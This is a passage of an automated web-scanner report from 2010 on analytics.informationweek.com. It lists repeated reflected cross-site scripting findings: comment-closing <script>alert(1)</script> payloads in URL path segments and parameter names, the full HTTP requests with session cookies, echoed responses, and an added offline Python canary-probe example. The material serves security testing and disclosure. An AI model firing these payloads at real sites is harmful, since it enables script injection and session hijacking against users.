The value of REST URL parameter 4 is copied into an HTML comment. The payload 379d3--><script>alert(1)</script>d2d0dc344c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:49 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... FRisk-management.html379d3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed2d0dc344c3&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3"> ...[SNIP]...
3.80. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/15/Risk-management/Risk-management.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2d82--><script>alert(1)</script>67632b3f5b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nagement.html%3Fa2d82--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E67632b3f5b1%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a149b--><script>alert(1)</script>3766ebdc316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:07 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... .com%2Fmenua149b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3766ebdc316%2F18%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload bab5e--><script>alert(1)</script>91f10c172cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:18 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenu%2F18bab5e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E91f10c172cc%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 19ada--><script>alert(1)</script>95f6d47511 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ile-and-wireless19ada--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E95f6d47511%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload e225f--><script>alert(1)</script>8515afb1e2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ile-wireless.htmle225f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8515afb1e2e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e"> ...[SNIP]...
3.85. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/18/Mobile-and-wireless/Mobile-wireless.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 552fb--><script>alert(1)</script>73854b4e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eless.html%3F552fb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E73854b4e76%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1"> ...[SNIP]...
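Every finding in this group rests on the same defect and was confirmed by the same test, so one worked example covers all of them. The Python below is an added example, not part of this report and not the site's code. It builds the canary-wrapped probe the scanner used (random hex prefix, the comment-closing payload, random hex suffix) and places it either in a chosen REST URL segment or as a parameter name, exactly as the requests above do; it renders a hypothetical page fragment that, like the responses above, writes the request URI into an HTML comment once percent-encoded and once raw; it classifies each echo as raw or transformed; and it renders the same fragment with output encoding applied so the difference is visible. The page template, the login link, the function names and the responses are assumptions constructed for the example; only the probe shape and the canaries e225f and 8515afb1e2e come from the report.

```python
"""Added example: offline reproduction of the canary-probe check and of the
comment-context reflection the findings describe. Template, URLs and
responses are constructed for the example; nothing here is the site's code."""
import html
import re
import secrets
from typing import Callable
from urllib.parse import quote

# Payload shape from the report: close the surrounding comment, then run script.
PROBE = "--><script>alert(1)</script>"
SAMPLE_PATH = "/menu/18/Mobile-and-wireless/Mobile-wireless.html"  # from the report


def make_probe() -> tuple[str, str, str]:
    """Random canaries around PROBE, like e225f--><script>alert(1)</script>8515afb1e2e.
    The canaries let the checker find this exact echo among any other <script> tags."""
    prefix = secrets.token_hex(3)[:5]
    suffix = secrets.token_hex(6)[:11]
    return prefix, prefix + PROBE + suffix, suffix


def inject_into_segment(path: str, index: int, probe: str) -> str:
    """Append the probe to the 1-based path segment, as the 'REST URL parameter N'
    requests in the report do (segment 1 of SAMPLE_PATH is 'menu', segment 2 is '18')."""
    parts = path.split("/")  # parts[0] is '' for an absolute path
    if not 1 <= index < len(parts):
        raise ValueError(f"{path} has no segment {index}")
    parts[index] += probe
    return "/".join(parts)


def inject_as_param_name(path: str, probe: str) -> str:
    """The 'name of an arbitrarily supplied request parameter' variant."""
    return f"{path}?{probe}=1"


def encode_for_html(value: str) -> str:
    """HTML entity encoding with quotes included: '>' becomes '&gt;', so '-->' cannot
    close a comment and '"' cannot close an attribute."""
    return html.escape(value, quote=True)


def render_vulnerable(request_uri: str) -> str:
    """Hypothetical fragment with the defect the report describes: a login link that
    carries the request URI is written into an HTML comment with no output encoding.
    The first copy is percent-encoded by the URL builder; the second is the raw URI."""
    login = ("/login?returnUrl=" + quote(request_uri, safe="")
             + "&siteId=300001&successfulLoginRedirect=" + request_uri)
    return f'<!-- login link for this page: <a href="{login}">sign in</a> -->'


def render_fixed(request_uri: str) -> str:
    """Same fragment, encoded for each context the value passes through: percent-encoded
    as a URL query value, then entity-encoded before it lands in HTML."""
    login = ("/login?returnUrl=" + quote(request_uri, safe="")
             + "&siteId=300001&successfulLoginRedirect=" + quote(request_uri, safe=""))
    return f'<!-- login link for this page: <a href="{encode_for_html(login)}">sign in</a> -->'


def classify_reflection(body: str, prefix: str, suffix: str) -> dict:
    """Find every prefix...suffix span in the response and count how the probe between
    them came back: raw (exploitable) or transformed (encoded or otherwise altered)."""
    hits = re.findall(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    raw = sum(1 for h in hits if h == PROBE)
    return {"raw": raw, "transformed": len(hits) - raw}


def check_segment(render: Callable[[str], str], path: str, index: int) -> dict:
    """Probe one path segment against a page renderer and classify the echo."""
    prefix, probe, suffix = make_probe()
    return classify_reflection(render(inject_into_segment(path, index, probe)), prefix, suffix)


def check_param_name(render: Callable[[str], str], path: str) -> dict:
    """Probe the parameter-name position against a page renderer and classify the echo."""
    prefix, probe, suffix = make_probe()
    return classify_reflection(render(inject_as_param_name(path, probe)), prefix, suffix)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        for i in range(1, 5):
            print(name, "segment", i, check_segment(render, SAMPLE_PATH, i))
        print(name, "param name", check_param_name(render, SAMPLE_PATH))
```

Run as a script it checks all four path segments and the parameter-name position against both renderers: the vulnerable renderer reports one raw echo per probe, the encoded one none. The percent-encoded copy is counted as transformed rather than safe on purpose; the browser will not turn `%3Cscript%3E` back into markup in that position, but the raw copy beside it is all an attacker needs, which is why the report rates every one of these findings as certain.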
The value of REST URL parameter 1 is copied into an HTML comment. The payload bb584--><script>alert(1)</script>60dd04d670d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ubb584--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E60dd04d670d%2F19%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload aea57--><script>alert(1)</script>9b59d6056e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F19aea57--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b59d6056e2%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 962ea--><script>alert(1)</script>d1972443112 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cture962ea--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed1972443112%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 40573--><script>alert(1)</script>b96df8e6712 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:48 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... re.html40573--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb96df8e6712&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712"> ...[SNIP]...
3.90. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4df2a--><script>alert(1)</script>bb132b834aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F4df2a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebb132b834aa%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fa9da--><script>alert(1)</script>6bac0ed8397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
